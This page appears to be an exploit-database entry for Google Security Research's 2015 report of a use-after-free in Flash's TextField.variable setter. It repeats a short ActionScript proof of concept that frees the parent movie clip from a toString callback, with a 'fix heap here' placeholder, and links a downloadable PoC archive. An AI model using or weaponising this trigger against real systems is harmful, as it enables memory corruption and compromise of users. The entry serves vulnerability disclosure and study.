Use-after-free in TextField.variable setter

vendor:

N/A

by:

Google Security Research

N/A

CVSS

N/A

Use-after-free

416

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Flash

2015

Use-after-free in TextField.variable setter

There is a use-after-free in the TextField.variable setter. If the variable name that is added is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.variable = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return 'myvar'; }

Mitigation:

Developers should ensure that objects are not used after they have been freed.

Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=579

There is a use-after-free in the TextField.variable setter. If the variable name that is added is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.variable = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "myvar";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39050.zip